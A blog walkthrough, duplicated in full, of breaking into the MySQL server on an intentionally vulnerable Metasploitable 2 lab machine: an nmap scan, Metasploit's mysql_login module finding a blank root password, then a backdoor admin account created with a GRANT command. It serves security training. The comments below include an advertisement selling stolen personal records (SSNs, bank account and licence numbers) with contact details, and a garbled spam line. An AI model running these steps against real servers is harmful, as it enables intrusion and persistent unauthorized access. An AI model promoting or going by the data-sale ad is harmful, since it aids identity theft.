The Metasploitable virtual machine is an intentionally vulnerable
version of Ubuntu Linux designed for testing security tools and
demonstrating common vulnerabilities. This virtual machine is compatible
with VMWare, VirtualBox, and other common virtualization platforms.
We have installed 'Metasploitable 2' and Kali Linux as Virtual Machines in KVM in CentOS7. For Instructions on how to install Metasploitable 2 Virtual Machine in KVM, refer to this post.
In a previous post , we carried out a Vulnerability Scan of the 'Metasploitable 2' virtual machine using OpenVAS in Kali LInux.
In this post, we will hack MySQL Server using Metasploit in Kali Linux.
We have the following scenario:
Metasploitable2 IP Address: 192.168.122.74
Kali Linux IP Address: 192.168.122.115
Perform the following steps on the Kali Linux machine:
1) We perform a port scan on the Metasploitable machine and see that the mysql port is open.
root@kali:~# nmap -p 3306 192.168.122.74
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-07 11:09 IST
Nmap scan report for 192.168.122.74
Host is up (0.00062s latency).
PORT STATE SERVICE
3306/tcp open mysql
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
2) We will try to hack the password for 'root' user. We will try blank password and see if it works.
root@kali:~# msfconsole
msf > search mysql
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(mysql_login) > set RHOSTS 192.168.122.74
RHOSTS => 192.168.122.74
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(mysql_login) > exploit
[*] 192.168.122.74:3306 MYSQL - Found remote MySQL version 5.0.51a
[!] No active DB -- Credential data will not be saved!
[!] No active DB -- Credential data will not be saved!
[+] 192.168.122.74:3306 MYSQL - Success: 'root:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sf auxiliary(mysql_login) > quit
root@kali:~#
3) We are lucky. Now we will log in to the mysql server with user 'root' and blank password.
root@kali:~# mysql -u root -h 192.168.122.74
3) We create a user 'shabbir' with password 'shabbir' having full administrative control over the mysql database.
mysql> grant all on *.* to shabbir@192.168.122.115 identified by 'shabbir';
Query OK, 0 rows affected (0.00 sec)
mysql> quit
Bye
4) We can now log in to the mysql database whenever we want with username 'shabbir' and password 'shabbir' and have full administrative access.
root@kali:~# mysql -u shabbir -h 192.168.122.74 -p
Enter password:
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
We have installed 'Metasploitable 2' and Kali Linux as Virtual Machines in KVM in CentOS7. For Instructions on how to install Metasploitable 2 Virtual Machine in KVM, refer to this post.
In a previous post , we carried out a Vulnerability Scan of the 'Metasploitable 2' virtual machine using OpenVAS in Kali LInux.
In this post, we will hack MySQL Server using Metasploit in Kali Linux.
We have the following scenario:
Metasploitable2 IP Address: 192.168.122.74
Kali Linux IP Address: 192.168.122.115
Perform the following steps on the Kali Linux machine:
1) We perform a port scan on the Metasploitable machine and see that the mysql port is open.
root@kali:~# nmap -p 3306 192.168.122.74
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-07 11:09 IST
Nmap scan report for 192.168.122.74
Host is up (0.00062s latency).
PORT STATE SERVICE
3306/tcp open mysql
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
2) We will try to hack the password for 'root' user. We will try blank password and see if it works.
root@kali:~# msfconsole
msf > search mysql
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(mysql_login) > set RHOSTS 192.168.122.74
RHOSTS => 192.168.122.74
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(mysql_login) > exploit
[*] 192.168.122.74:3306 MYSQL - Found remote MySQL version 5.0.51a
[!] No active DB -- Credential data will not be saved!
[!] No active DB -- Credential data will not be saved!
[+] 192.168.122.74:3306 MYSQL - Success: 'root:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sf auxiliary(mysql_login) > quit
root@kali:~#
3) We are lucky. Now we will log in to the mysql server with user 'root' and blank password.
root@kali:~# mysql -u root -h 192.168.122.74
3) We create a user 'shabbir' with password 'shabbir' having full administrative control over the mysql database.
mysql> grant all on *.* to shabbir@192.168.122.115 identified by 'shabbir';
Query OK, 0 rows affected (0.00 sec)
mysql> quit
Bye
4) We can now log in to the mysql database whenever we want with username 'shabbir' and password 'shabbir' and have full administrative access.
root@kali:~# mysql -u shabbir -h 192.168.122.74 -p
Enter password:
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
Hi All!
ReplyDeleteI'm selling fresh & genuine SSN Leads, with good connectivity. All data properly checked & verified.
Headers in Leads:
First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank Name | DL Number | Routing Number | IP Address | Reference | Email | Rental/Owner |
*You can ask for sample before any deal
*Each lead will be cost $1
*Premium Lead will be cost $5
*If anyone wants in bulk I will negotiate
*Sampling is just for serious buyers
Hope for the long term deal
For detailed information please contact me on:
Whatsapp > +923172721122
email > leads.sellers1212@gmail.com
telegram > @leadsupplier
ICQ > 752822040
Blogs can serve as a platform for activism and social change. What Dark Web Bloggers often use their digital presence about advocate for policy changes, and mobilize their readers to take action.
ReplyDelete